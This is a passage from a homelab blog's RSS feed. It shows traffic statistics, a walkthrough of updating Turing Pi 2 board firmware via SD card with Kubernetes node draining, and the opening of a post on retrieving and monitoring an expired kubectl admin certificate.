PeerTube sends out a lot more requests, even if nobody on the instance would
ever receive them.</p>
<p>Next are the operating systems and browsers. I&rsquo;m genuinely unsure how interesting
these are, considering that some bots like to lie. And goaccess doesn&rsquo;t do any
deep analysis, it just looks at the access log line&rsquo;s User Agent string.</p>
<table>
  <thead>
      <tr>
          <th style="text-align: right">Hits</th>
          <th style="text-align: right">Percentage of Total Hits</th>
          <th>Operating System</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td style="text-align: right">14734214</td>
          <td style="text-align: right">72%</td>
          <td>Crawlers</td>
      </tr>
      <tr>
          <td style="text-align: right">2602332</td>
          <td style="text-align: right">12%</td>
          <td>Unknown</td>
      </tr>
      <tr>
          <td style="text-align: right">848514</td>
          <td style="text-align: right">5%</td>
          <td>Windows</td>
      </tr>
      <tr>
          <td style="text-align: right">720961</td>
          <td style="text-align: right">3%</td>
          <td>Android</td>
      </tr>
      <tr>
          <td style="text-align: right">211467</td>
          <td style="text-align: right">1%</td>
          <td>Linux</td>
      </tr>
      <tr>
          <td style="text-align: right">163847</td>
          <td style="text-align: right">0.81%</td>
          <td>macOS</td>
      </tr>
      <tr>
          <td style="text-align: right">26675</td>
          <td style="text-align: right">0.45%</td>
          <td>iOS</td>
      </tr>
  </tbody>
</table>
<p>So it&rsquo;s clear that my Homelab mostly exists for the benefit of crawlers. &#x1f609;
What I did find a bit surprising was that Linux is so far down, considering that
the majority of people arriving at my proxy have to be coming for the blog. While
the Crawlers category will also contain stuff like Fediverse servers, my blog is
the only other interesting, externally accessible service. And considering that
that&rsquo;s mostly really nerdy Homelab content, I would have thought that the
percentage of Linux users would be higher. It is of course possible that bots
which mask as normal users tend to use Windows instead of Linux?</p>
<p>The last interesting stat overall is the actual domains getting hit:</p>
<table>
  <thead>
      <tr>
          <th style="text-align: right">Hits</th>
          <th style="text-align: right">Percentage of Total Hits</th>
          <th>Domain</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td style="text-align: right">16862714</td>
          <td style="text-align: right">73%</td>
          <td>social.mei-home.net</td>
      </tr>
      <tr>
          <td style="text-align: right">1690065</td>
          <td style="text-align: right">34%</td>
          <td>blog.mei-home.net</td>
      </tr>
      <tr>
          <td style="text-align: right">633110</td>
          <td style="text-align: right">3%</td>
          <td>bookwyrm.mei-home.net</td>
      </tr>
      <tr>
          <td style="text-align: right">453558</td>
          <td style="text-align: right">2%</td>
          <td>cloud.mei-home.net</td>
      </tr>
      <tr>
          <td style="text-align: right">425668</td>
          <td style="text-align: right">2%</td>
          <td>s3-mastodon.mei-home.net</td>
      </tr>
      <tr>
          <td style="text-align: right">42625</td>
          <td style="text-align: right">0.2%</td>
          <td>mei-home.net</td>
      </tr>
      <tr>
          <td style="text-align: right">41970</td>
          <td style="text-align: right">0.2%</td>
          <td>s3-bookwyrm.mei-home.net</td>
      </tr>
  </tbody>
</table>
<p>Nothing really surprising here. Most of the traffic comes from my Mastodon
instance. What is a bit surprising is that the blog is still responsible for 34%
of the requests. I don&rsquo;t think I&rsquo;ve got that many readers, especially compared to
the amount of traffic my Mastodon instance produces. Perhaps it&rsquo;s all the RSS
feed readers everyone self-hosts?</p>
<p>So much for describing the goaccess tool a bit and looking at the data from
the last three years for my Homelab&rsquo;s ingress. This taught me two things:</p>
<ol>
<li>I really want to get a move on and introduce some sort of metrics gathering
for my blog</li>
<li>I really should introduce log rotation for the Traefik logs on my bastion host &#x1f605;</li>
</ol>
]]></content:encoded>
    </item>
    <item>
      <title>Updating the Firmware on my Turing Pi 2 Boards</title>
      <link>https://blog.mei-home.net/posts/tp2-fw-update/</link>
      <pubDate>Thu, 18 Dec 2025 21:50:36 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/tp2-fw-update/</guid>
      <description>I had to touch hardware</description>
      <content:encoded><![CDATA[<p>Wherein I update my Turing Pi 2 boards to a new firmware.</p>
<p>During the migration of my Homelab to a fleet of Raspberry Pi 4, I bought two
<a href="https://turingpi.com/product/turing-pi-2-5/">Turing Pi 2 boards</a> and put eight
Raspberry Pi CM4 8GB into them. You can read more about my setup <a href="https://blog.mei-home.net/posts/turing-pi-2/">here</a>.</p>
<p>The board has a nice Board Management Controller (BMC). It is an Allwinner SoC
with 128 MB of RAM and 128 MB of flash for the OS. It&rsquo;s running an embedded Linux
distribution. This BMC implements a few interesting features:</p>
<ul>
<li>Turning power on/off for each individual node</li>
<li>Connecting to the serial console of each of the nodes</li>
<li>Flashing each of the nodes if it has internal storage, like Pi CM4 with eMMC</li>
</ul>
<p>There is also an internal Ethernet switch chip, which connects the four nodes
and two external 1GbE ports for external connectivity. Sadly, that chip is not
really controllable yet, even with the newest firmware. So it&rsquo;s still only
usable as a dumb switch.</p>
<p>As originally delivered, the firmware was perfectly workable, I&rsquo;ve been running
my boards with it for two years. But it was also a bit problematic, as it provided
a web UI without any authentication at all. And you could flash nodes via it and
turn them on and off.</p>
<p>The v2 firmware I&rsquo;m installing in this blog post has proper authentication, and
adds support for a CLI tool which can be used to control the board remotely, in
addition to the web UI.</p>
<p>The new version also adds support for the Turing Pi <a href="https://turingpi.com/product/turing-rk1/">RK1</a>.
That&rsquo;s an SBC based on the RK3588 SoC, developed by the same people who designed
the Turing Pi 2 board. And I&rsquo;ve got one of those laying around. But more on that
later.</p>
<h2 id="firmware-update">Firmware update</h2>
<p>I was still on the original v1 firmware and needed to update to the most recent
<a href="https://github.com/turing-machines/BMC-Firmware/releases/tag/v2.1.0">v2.1</a>. One
note: For some reason, their docs point to <a href="https://firmware.turingpi.com/turing-pi2/">this part of their website</a>
from the docs, but the newer firmware versions are only available in their
<a href="https://github.com/turing-machines/BMC-Firmware">GitHub repo</a>.</p>
<p>For the update, I followed <a href="https://docs.turingpi.com/docs/turing-pi2-bmc-v1x-to-v2x">these docs</a>.
While the new version of the firmware supports flashing via the web UI, this
update from v1 to v2 needs to be done via the SD card.</p>
<p>But before I could get started, I had to solve the Homelab uptime problem. As I&rsquo;m
running a very serious operation here, I could of course not tolerate any downtime
for any services. But at the same time, this update couldn&rsquo;t be done online, so
I would have to take down four of my CM4. Meaning 16 cores and 32 GB of RAM would
be temporarily unavailable. And while my Homelab is intentionally designed with
some slack, I didn&rsquo;t have quite that much slack left. So I went to my Ceph
hosts, specifically the largest, which has 32 GB of RAM. Which it currently does
definitely not need. Here is what my three Ceph hosts look like under normal
operation:</p>
<pre tabindex="0"><code>ceph1:
Allocated resources:
  (Total limits may be over 100 percent, i.e., overcommitted.)
  Resource           Requests       Limits
  --------           --------       ------
  cpu                3 (75%)        0 (0%)
  memory             11412Mi (72%)  14624Mi (92%)
ceph2:
Allocated resources:
  (Total limits may be over 100 percent, i.e., overcommitted.)
  Resource           Requests       Limits
  --------           --------       ------
  cpu                3400m (85%)    0 (0%)
  memory             11824Mi (77%)  15648Mi (102%)
ceph3:
Allocated resources:
  (Total limits may be over 100 percent, i.e., overcommitted.)
  Resource           Requests       Limits
  --------           --------       ------
  cpu                3150m (39%)    0 (0%)
  memory             10276Mi (32%)  14012Mi (44%)
</code></pre><p>So at least going by the limits, two of them were almost full already. But ceph3
still had enough unused resources to hold a few Pods during the downtime.</p>
<p>So I removed the NoSchedule taint from it like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl taint nodes ceph3 homelab/taint.role<span style="color:#f92672">=</span>ceph:NoSchedule-
</span></span></code></pre></div><p>With that, it would be allowed to run non-Ceph Pods.</p>
<p>I then drained the four CM4 on the first board:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl drain --delete-emptydir-data --force --ignore-daemonsets worker1 worker2 worker3 worker4
</span></span></code></pre></div><p>And finally shut them all down:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ansible <span style="color:#e6db74">&#34;worker1:worker2:worker3:worker4&#34;</span> -a <span style="color:#e6db74">&#34;systemctl poweroff&#34;</span>
</span></span></code></pre></div><p>I will describe the effects and show some metrics about the shutdown&rsquo;s impact on
my cluster later in this post.</p>
<p>To prepare the update, I needed to put the firmware on an SD card. Here are
the commands to do that:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>wget https://github.com/turing-machines/BMC-Firmware/releases/download/v2.1.0/tp2-firmware-sdcard-v2.1.0.img
</span></span><span style="display:flex;"><span>dd <span style="color:#66d9ef">if</span><span style="color:#f92672">=</span>tp2-firmware-sdcard-v2.1.0.img of<span style="color:#f92672">=</span>/non-existant-path bs<span style="color:#f92672">=</span>1M status<span style="color:#f92672">=</span>progress
</span></span></code></pre></div><p>The <code>of</code> parameter should then point to the SD card. Point it to the device, e.g.
<code>/dev/sde</code>, not <code>/dev/sde1</code>.</p>
<p>With that done, I opened the board&rsquo;s schematics to hunt for the SD card slot:
<figure>
    <img loading="lazy" src="tp2-top.png"
         alt="A schematic of the top side of the Turing Pi 2 board. The important part is that there&#39;s no SD card slot anywhere on it. What follows is a more detailed description, but I only provide it for completeness&#39; sake, it is not relevant for the rest of the post and you can safely skip it. In the center of the board are the four slots for the compute modules. Each of them has a fan header next to it. They&#39;re connected to different peripherals on the board. The top slot is connected an mPCIe slot. The second node is connected to another mPCIe slot. Node 3 has connections to two SATA3 ports. Node 4 is connected to two USB 3.0 ports. In addition, there is a GPIO 40-pin connector and a slot for a CR2032 battery. Power is supplied via a standard 24-pin ATX connector in the bottom left corner. Along the lower right edge are several external ports, from top to bottom: 1x CM4 USB connector. 1x HDMI display connector. 2x 1GbE RJ45 jacks. 2x USB 3.0 connectors. On the upper edge are some internal connectors for UART to the nodes and the BMC. Along the left edge are some more internal connectors, namely 2x SATA 3 ports, 2x internal USB 3.0 ports, the front panel IO header and a DSI header."/> <figcaption>
            <p>No SD card slot on the top of the boards. From <a href="https://docs.turingpi.com/docs/turing-pi2-specs-and-io-ports">https://docs.turingpi.com/docs/turing-pi2-specs-and-io-ports</a></p>
        </figcaption>
</figure>

Sadly, the SD card slot is not on the top, but instead it&rsquo;s on the bottom:
<figure>
    <img loading="lazy" src="tp2-bottom.png"
         alt="A schematic of the bottom side of the Turing Pi 2 board. There&#39;s a lot less to see here. Along the left side are for M.2 NVMe slots for storage. And to the right of them, quite a bit away from the edge of the board, is a lone SD card slot."/> <figcaption>
            <p>There is the SD card slot. From <a href="https://docs.turingpi.com/docs/turing-pi2-specs-and-io-ports">https://docs.turingpi.com/docs/turing-pi2-specs-and-io-ports</a></p>
        </figcaption>
</figure>
</p>
<p>The slot is entirely inaccessible while the board is mounted in a case.</p>
<p>So I had to do the one thing about Homelabbing I actually don&rsquo;t enjoy that much:
Touching hardware. I&rsquo;m still thinking that at some point, I should click myself
something roughly equivalent to my Homelab at a large cloud provider and see how expensive it really is.</p>
<p>Here is the board still in the case:
<figure>
    <img loading="lazy" src="tp2-in-case.jpg"
         alt="A picture of the TP2 board sitting in a 3U rack case. It has four Raspberry Pi CM4 modules in it. It&#39;s connected with a 24-pin ATX connector to a normal ATX power supply. Also connected is part of the front panel header and the internal USB connector. In addition, there&#39;s a Noctua fan controller sitting there, connected to two 120mm Noctua fans and powered by one of the SATA rails from the power supply. It is all extremely dusty. As in: You couldn&#39;t just write your name in it. You could write the entirety of The Prince in it, with multiple layers."/> <figcaption>
            <p>One of the boards in its 3U rack case. Dust left in for realism.</p>
        </figcaption>
</figure>

Dusted after taking the picture, so you all know its real. &#x1f605;</p>
<p>I was a bit apprehensive about taking the case out of the rack, to be honest. This
particular case was mounted before I figured out how rack rails work. And I was
pretty brutal with the ones for this case. I didn&rsquo;t see any problem with taking
it out. But I was a bit worried whether I would be able to put it back in again.
Luckily, it all worked out at the end.</p>
<p>With the board removed from the case, I was finally able to access the SD card
slot:
<figure>
    <img loading="lazy" src="tp2-backside.jpg"
         alt="A picture of the backside of the board. It shows exactly what the schematics above showed: Four M.2 slots for NVMe SSDs and a single lone SD card slot, definitely too far away from the edge of the board to be accessible while the board is mounted in a case."/> <figcaption>
            <p>There&rsquo;s the SD card slot.</p>
        </figcaption>
</figure>
</p>
<p>I&rsquo;ve finally found the place to put the SD card. This was already a lot more work
than I had initially thought. But from hereon out, everything went quite smoothly.
I connected the board&rsquo;s UART to my trusty USB-to-Serial adapter and launched minicom:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>minicom -b <span style="color:#ae81ff">115200</span> -D /dev/ttyUSB0
</span></span></code></pre></div><p>After starting the board, I was greeted with this text on said console:</p>
<pre tabindex="0"><code> _____ _   _ ____  ___ _   _  ____
|_   _| | | |  _ \|_ _| \ | |/ ___|
  | | | | | | |_) || ||  \| | |  _
  | | | |_| |  _ &lt; | || |\  | |_| |
  |_|  \___/|_| \_\___|_| \_|\____|

This utility will perform a fresh installation of the Turing Pi 2 BMC firmware.

Note that this will ERASE ALL USER DATA stored on the Turing Pi 2 BMC, thus
restoring back to factory defaults. Do NOT proceed unless you have first backed
up any files that you care about!

If you wish to confirm the operation and proceed, either:
1) Type &#39;CONFIRM&#39; at the below prompt
2) Press one of the front panel buttons (POWER or RESET), or the KEY1 button on
   the Turing Pi 2 board itself, three times in a row

If you are here in error, please remove the microSD card from the Turing Pi 2
board and reset the BMC.

Type &#34;CONFIRM&#34; to continue:
</code></pre><p>I typed <code>CONFIRM</code> here as instructed, but the flashing could also be started by
pressing a button on the board itself 3x in quick succession. So a serial connection
is not strictly necessary.
The flashing went pretty quickly, in under a minute, with relatively little
output:</p>
<pre tabindex="0"><code>INFO: Legacy Allwinner boot code has been found and erased
INFO: Legacy Allwinner boot code has been found and erased
INFO: AWNAND SIMULATE_MULTIPLANE layout detected, performing migration
INFO: AWNAND SIMULATE_MULTIPLANE layout detected, performing migration
INFO: AWNAND SIMULATE_MULTIPLANE layout detected, performing migration
INFO: AWNAND SIMULATE_MULTIPLANE layout detected, performing migration
INFO: AWNAND SIMULATE_MULTIPLANE layout detected, performing migration
INFO: AWNAND SIMULATE_MULTIPLANE layout detected, performing migration
INFO: AWNAND SIMULATE_MULTIPLANE layout detected, performing migration
INFO: AWNAND SIMULATE_MULTIPLANE layout detected, performing migration
INFO: AWNAND SIMULATE_MULTIPLANE layout detected, performing migration
INFO: AWNAND SIMULATE_MULTIPLANE layout detected, performing migration
INFO: AWNAND SIMULATE_MULTIPLANE layout detected, performing migration
INFO: AWNAND SIMULATE_MULTIPLANE layout detected, performing migration
INFO: AWNAND SIMULATE_MULTIPLANE layout detected, performing migration
INFO: AWNAND SIMULATE_MULTIPLANE layout detected, performing migration
INFO: AWNAND SIMULATE_MULTIPLANE layout detected, performing migration
INFO: AWNAND SIMULATE_MULTIPLANE layout detected, performing migration
INFO: Legacy Allwinner boot code has been found and erased
INFO: Legacy Allwinner boot code has been found and erased
[+] DONE: Please remove the microSD card and reset the BMC.
</code></pre><p>As instructed, I removed the SD card and rebooted the board. I was immediately
greeted by some Linux boot output and then a login prompt. Everything had worked
nicely.</p>
<p>I needed to do a few little adaptions to the configuration though. First, the
MAC had changed, so I needed to update it in my DHCP static leases. At least the
MAC is now static by default, instead of being generated anew every time the board
boots, as with the previous firmware.
Then I set the hostname in <code>/etc/hosts</code> and <code>/etc/hostname</code> and updated the root
password. Finally, I created a non-root user:</p>
<ul>
<li><code>mkdir -p /home/myuser</code></li>
<li><code>adduser -s /bin/bash -D myuser</code></li>
<li>Then I went into <code>/etc/shadow</code> and replaced the <code>!</code> with a <code>*</code> in the password
field. No idea why I had run with the <code>-D</code> option initially.</li>
</ul>
<p>Then I could switch to the user and enter a few SSH keys. Finally, I also had
to change the SSHD configuration. Because by default, it allows password logins
and logins of root. I added/changed the following configs:</p>
<ul>
<li><code>PubkeyAuthentication yes</code></li>
<li><code>PermitRootLogin no</code></li>
<li><code>PasswordAuthentication no</code></li>
<li><code>AllowUsers myuser</code></li>
</ul>
<p>The restart of SSHD was a bit tricky. There&rsquo;s a script they tell you to use:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>/etc/init.d/S50sshd restart
</span></span></code></pre></div><p>The problem is that that&rsquo;s a shell script which first stops SSHD and then starts
it again. As you might imagine, that doesn&rsquo;t go too well when executed via SSH.
While the stop action is still run, the terminal is disconnected after that,
because SSH is gone. So the start command is never run.</p>
<p>But that&rsquo;s it already. After those steps I was able to put the board back into
the case and start with the next one.</p>
<p>With that done too, the only thing left was to add back the taint to my Ceph
node so it&rsquo;s no longer used for non-Ceph stuff:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl taint nodes ceph3 homelab/taint.role<span style="color:#f92672">=</span>ceph:NoSchedule
</span></span></code></pre></div><p>Same command as removing the taint, just without the <code>-</code> at the end.</p>
<h2 id="results">Results</h2>
<p>Well, first of all: Most things still worked. Emphasis on <em>most</em>. The one thing
which no longer seems to work is connecting to the node&rsquo;s serial consoles. It
just outputs garbage. And it seems that&rsquo;s because the new <a href="https://github.com/turing-machines/bmcd">BCMd</a>
opens the serial console devices as well. So you now can&rsquo;t open them anymore when
SSH&rsquo;d into the board. Which really isn&rsquo;t ideal.</p>
<p>But onto the good things. First, there&rsquo;s been a rework of the UI. Here&rsquo;s an
example of the old UI:
<figure>
    <img loading="lazy" src="old-ui.png"
         alt="A screenshot of the old Turing Pi 2 web UI&#39;s power tab. It shows four selector switches for turning power on and off for each node and a Submit button at the bottom."/> <figcaption>
            <p>The old Turing Pi 2 v1 web UI</p>
        </figcaption>
</figure>

And here&rsquo;s the equivalent page on the new UI:
<figure>
    <img loading="lazy" src="new-ui.png"
         alt="Another screenshot of a similar page. the theme is now dark. Each node has two additional fields the user can set, one for the node name and one for the node module type. In addition to the previously present power toggle, there&#39;s now also a restart button. Also in contrast to the previous version, the UI is now labeled in German."/> <figcaption>
            <p>The new Turing Pi 2 web UI</p>
        </figcaption>
</figure>

I like the new style and the fact that there&rsquo;s now a dark theme. Plus, the restart
buttons are nice. Previously, when I needed to do a hard reset of one of the nodes,
I had to first switch it off and then switch it back on again. In the future, that
will be one click.
In addition, this UI now has proper authentication, where the previous version
had exactly none. It uses the accounts of the BMC system, there&rsquo;s not separate
user management for the web UI.</p>
<p>In addition to this update of the UI, there&rsquo;s now an HTTP API and a CLI tool
for using it, the <a href="https://github.com/turing-machines/tpi">tpi tool</a>. It can do
all of the things the web UI can, and then some. For example, this command will
show the serial console output of node 2:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>tpi uart --host my.turingpi --user root --node <span style="color:#ae81ff">2</span> get
</span></span></code></pre></div><p>This functionality is the reason that the serial consoles are useless when you&rsquo;re
actually logged into the BMC, see <a href="https://github.com/turing-machines/BMC-Firmware/issues/200">this issue</a>.</p>
<p>Finally: The new firmware has support for flashing and using the <a href="https://turingpi.com/product/turing-rk1/">Turing RK1</a>.
An RK3588-based SBC that can be plugged into the Turing Pi 2 boards. I should be
excited about it. I bought one of them a while ago, with 32 GB of RAM. It would
be really cool to use these as an upgrade path for my Homelab. The RK3588 is a
good chip and makes a nice Homelab host with 8 cores.
But there&rsquo;s exactly zero broad support for the chip in Linux. There is an Ubuntu
that&rsquo;s supposed to work, <a href="https://github.com/Joshua-Riek/ubuntu-rockchip">ubuntu-rockchip</a>.
But the maintainer stepped back from it about a year ago. So what am I supposed to
do? Run a chip with an outdated kernel, running services accessible from the
Internet? I don&rsquo;t think so.</p>
<p>So very likely, I will keep it as a high-tech paperweight.
What do you mean I sound miffed with my past self for dropping money on a piece
of hardware with shaky software support? Naaah, not at all. &#x1f612;</p>
<h2 id="how-the-homelab-reacted">How the Homelab reacted</h2>
<p>Before ending this post, I&rsquo;d like to do a quick section about what the Homelab
looked like during the periods where I took one of the Turing Pi boards out of
the cluster. Those Pi CM4 8GB modules in the two Turing Pi 2 boards are my main
worker nodes. I&rsquo;ve also got one more node, an older x86 SBC I keep around for
apps which don&rsquo;t support aarch64. So with taking out one of the boards, I lose
16 cores and 32 GB of RAM. And my Homelab didn&rsquo;t really bat an eye at that. I&rsquo;ve
already got a bit of slack in the resources. The idea being that I can take out
a few nodes for maintenance, e.g. reboots during the regular host updates, without
having to take down the entire Homelab.</p>
<p>So there wasn&rsquo;t much of a change in the k8s cluster and my apps. Temporarily
allowing Pods onto my largest Ceph node took care of that. But there was a
reduction in the overall power consumption of the Homelab.</p>
<figure>
    <img loading="lazy" src="power.png"
         alt="A screenshot of a Grafana time series chart with one plot. It shows the power consumption of my Homelab over the time period from 2025-12-12 to 2025-12-18. The plot shows an average power consumption between 155 and 165 W. Some high spikes go up to over 200 W, but those are only very short spikes. The only exception is the period between the 21:00 on the 15th and 17:30 on the 16th. In that period, the power consumption goes down to about 140 - 150 W, before going aback to the previous values."/> <figcaption>
            <p>Power consumption of my entire Homelab</p>
        </figcaption>
</figure>

<p>This plot shows that one full board with 16 cores and 32 GB worth of Pi 4 consume
somewhere around 20 - 25 W under normal conditions. But there was one effect I will
have to think about a bit more:</p>
<figure>
    <img loading="lazy" src="power-zoomed.png"
         alt="A screenshot of the same chart, but now zoomed into the time when I first disconnected the board from power entirely, pulling the power plug. It goes from 19:10 to 23:00. At the beginning, the consumption hovers around 155 to 160 W. Then, at 21:04, it drops a bit to 146 W. Another drop happens around 21:16, down to 136 W. After that drop, the power consumption mostly stays around that value."/> <figcaption>
            <p>Power consumption of my Homelab, zoomed in.</p>
        </figcaption>
</figure>

<p>In the plot, I switched off the four Pi CM4 on the board around 21:04, resulting
in the initial drop from 156 W to about 146 W. Then, at about 21:16, I pulled
the power plug from the PSU, resulting in another drop to 138 W. Which honestly
looks a bit weird? By that time, the only thing powered on were two 120mm fans
on pretty low revolutions and the BMC itself, which is a piddly Allwinner SoC
and really shouldn&rsquo;t eat almost 10 W. The only thing I can come up with is: Could
this be the fact that the power supply is a 550 W unit? And it&rsquo;s running at very
low power draw and is terribly inefficient at that point?</p>
<p>Might warrant some more investigations.</p>
<p>And just in case I don&rsquo;t find time for another post before it: Happy Christmas
to all of you who celebrate. I hope you find at least a modicum of peace and
quiet.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Kubernetes Cert Renewal and Monitoring</title>
      <link>https://blog.mei-home.net/posts/k8s-certs/</link>
      <pubDate>Sun, 07 Dec 2025 11:15:45 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-certs/</guid>
      <description>I had a little k8s certificate SNAFU</description>
      <content:encoded><![CDATA[<p>Wherein I let my kubectl certs expire and implement some monitoring.</p>
<p>A couple of days ago, I was getting through my list of small maintenance tasks
in my Kubernetes cluster. Stuff like checking the resource consumption of new
deployments and adapting the resource limits. And in the middle of it, one of
my kubectl invocations was greeted by this message:</p>
<pre tabindex="0"><code>error: You must be logged in to the server (Unauthorized)
</code></pre><p>So I had a look at my kubectl credentials. For those who don&rsquo;t know, kubectl
authenticates to the cluster with a client TLS cert by default. I had just
copied the <code>admin.conf</code> config file kubeadm helpfully creates during cluster
setup. I didn&rsquo;t really see any reason to set up anything more elaborate,
considering that I&rsquo;m the only admin in the cluster.</p>
<p>And those certs had now expired. Not really a big deal, I have access to the
control plane nodes and could copy the new <code>admin.conf</code>. But I wanted to
introduce some monitoring and document how to renew the kubectl client certs.</p>
<p>The first problem to tackle: I wanted something a bit more elaborate than
&ldquo;just <code>cat /etc/kubernetes/admin.conf</code> and copy+paste the cert and key&rdquo;. And
here&rsquo;s where the embarrassment began. The <code>admin.conf</code> is available on my three
control plane nodes. But how to get it onto my command and control machine?</p>
<p>My first thought was: Just use SSH! But the problem was: I don&rsquo;t allow root
logins via SSH. And the <code>admin.conf</code> is owned by root and not readable by anyone
else. So if I wanted to do it over SSH, I would need to also somehow get a sudo
call in there. Easier said than done. Because the only account which has SSH
access to my machines can&rsquo;t just do sudo - it needs to provide a password, as
an additional security layer. And it took me a really, really long time to
figure out how to call sudo via SSH and get the password through the pipe to sudo.</p>
<p>Here&rsquo;s the script I came up with:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e">#!/bin/bash
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Kubeadm installs put an admin user kube.conf file at /etc/kubernetes/admin.conf</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># by default</span>
</span></span><span style="display:flex;"><span>ADMIN_FILE<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;/etc/kubernetes/admin.conf&#34;</span>
</span></span><span style="display:flex;"><span>ADMIN_TEMP<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>HOME<span style="color:#e6db74">}</span><span style="color:#e6db74">/temp/admin.conf&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Name of the control plane host</span>
</span></span><span style="display:flex;"><span>CP_HOST<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;control-plane-1&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Request the sudo password and put it into SUDO_PASS</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># -s prevents echoing of the input on the terminal</span>
</span></span><span style="display:flex;"><span>read -p <span style="color:#e6db74">&#34;Sudo pass: &#34;</span> -r -s SUDO_PASS
</span></span><span style="display:flex;"><span>echo
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>ssh myuser@<span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>CP_HOST<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#e6db74">&#34;sudo -p \&#34;\&#34; -S cat </span><span style="color:#e6db74">${</span>ADMIN_FILE<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">&lt;&lt;&lt;</span><span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>SUDO_PASS<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> &gt; ~/temp/admin.conf
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># This extracts the certificate and the private key from the kube config</span>
</span></span><span style="display:flex;"><span>CERT_DATA<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>yq -r <span style="color:#e6db74">&#39;.users[0].user.&#34;client-certificate-data&#34;&#39;</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>ADMIN_TEMP<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> | base64 -d | sed -e <span style="color:#e6db74">&#39;s/$/\\n/g&#39;</span> | tr -d <span style="color:#e6db74">&#39;\n&#39;</span><span style="color:#66d9ef">)</span>
</span></span><span style="display:flex;"><span>CERT_KEY<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>yq -r <span style="color:#e6db74">&#39;.users[0].user.&#34;client-key-data&#34;&#39;</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>ADMIN_TEMP<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> | base64 -d | sed -e <span style="color:#e6db74">&#39;s/$/\\n/g&#39;</span> | tr -d <span style="color:#e6db74">&#39;\n&#39;</span><span style="color:#66d9ef">)</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Removing the temporary file for security</span>
</span></span><span style="display:flex;"><span>rm <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>ADMIN_TEMP<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Finally outputting the cert</span>
</span></span><span style="display:flex;"><span>echo <span style="color:#e6db74">&#34;CERT:&#34;</span>
</span></span><span style="display:flex;"><span>echo <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>CERT_DATA<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>echo <span style="color:#e6db74">&#34;Key:&#34;</span>
</span></span><span style="display:flex;"><span>echo <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>CERT_KEY<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span></code></pre></div><p>The main piece here is the actual copying, which took me way too long to figure
out:</p>
